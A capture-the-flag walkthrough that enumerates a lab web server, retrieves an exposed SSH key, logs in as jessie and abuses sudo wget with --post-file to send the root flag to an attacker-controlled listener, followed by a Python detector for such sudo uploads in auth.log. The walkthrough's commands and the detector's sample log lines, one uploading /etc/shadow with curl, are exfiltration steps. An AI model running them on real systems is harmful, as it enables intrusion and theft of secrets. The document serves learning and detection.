1. Port scan
nmap -Pn <ip>
2. OS and service scan
nmap -A -p 22,80 <ip>
3. Access the HTTP site and view the page source. There's a hidden message in it that seems to give away a username: jessie (or Jessie).
4. Scan with gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html
There's a /sitemap directory. Accessing /sitemap shows nothing much.
5. Scan sitemap with gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/sitemap/ -x php,txt,html
Nothing much, since I had already accessed these pages.
6. Scan the sitemap with gobuster using another wordlist
gobuster dir --wordlist /usr/share/dirb/wordlists/common.txt -u http://<ip>/ -x php,txt,html
7. Now I found the SSH private key.
8. Download it
wget http://<ip>/sitemap/.ssh/id_rsa
9. Change permission
chmod 600 id_rsa
10. Login with SSH
ssh -i id_rsa jessie@<ip>
11. Explore /home/jessie
ls
cd Desktop
ls
cd ..
cd Documents
ls
cat user_flag.txt
12. Check if jessie can use sudo
sudo -l
There's wget. I can use it to send the root flag to my machine.
13. Create listener for root flag file
nc -lvp 80 > root.txt
14. Send file
sudo wget --post-file=/root/root_flag.txt <attacker ip>
15. Read root flag file
ls
cat root_flag.txt
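From the defender's side, the sudo step above is the one that leaves a clean trace: sudo logs every command it runs to syslog. The following Python script is an added example (not part of this walkthrough) that parses the sudo entries from /var/log/auth.log and flags privileged wget or curl invocations carrying a file-upload option; the hostname, user, paths, IP and log lines are constructed, and the curl case goes beyond the wget step on this page.

```python
import re

# Constructed sample in the syslog format sudo writes to /var/log/auth.log.
# Hostname, user, paths and the 10.9.1.5 address are made up for this example.
SAMPLE_AUTH_LOG = """\
Dec  3 10:14:02 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=list
Dec  3 10:15:22 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root_flag.txt 10.9.1.5
Dec  3 10:16:01 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget https://example.com/update.tar.gz
Dec  3 10:17:40 wgel sudo:     root : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/curl -T /etc/shadow http://10.9.1.5/
"""

# sudo's log line: "<user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<argv>"
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)
# Options that make wget/curl send the contents of a local file to a remote host.
UPLOAD_FLAGS = ("--post-file", "--body-file", "--upload-file", "-T")
TOOLS = ("wget", "curl")


def parse_sudo_events(log_text):
    """Return a dict (user, target, cmd) for every sudo COMMAND= line."""
    events = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if m:
            events.append(m.groupdict())
    return events


def is_upload_via_sudo(event):
    """True when a privileged wget/curl run carries a file-upload option."""
    argv = event["cmd"].split()
    if not argv:
        return False
    tool = argv[0].rsplit("/", 1)[-1]  # "/usr/bin/wget" -> "wget"
    if tool not in TOOLS:
        return False
    # Match both "--post-file=/path" and "-T /path" spellings.
    return any(a == f or a.startswith(f + "=") for a in argv[1:] for f in UPLOAD_FLAGS)


def find_exfil_events(log_text):
    """Return (user, cmd) pairs that look like sudo-assisted file exfiltration."""
    return [(e["user"], e["cmd"]) for e in parse_sudo_events(log_text)
            if is_upload_via_sudo(e)]


if __name__ == "__main__":
    for user, cmd in find_exfil_events(SAMPLE_AUTH_LOG):
        print(f"ALERT sudo upload by {user}: {cmd}")
```

Plain `sudo wget <url>` downloads and the `sudo -l` listing (logged as `COMMAND=list`) are left alone, so the rule only fires on the upload direction.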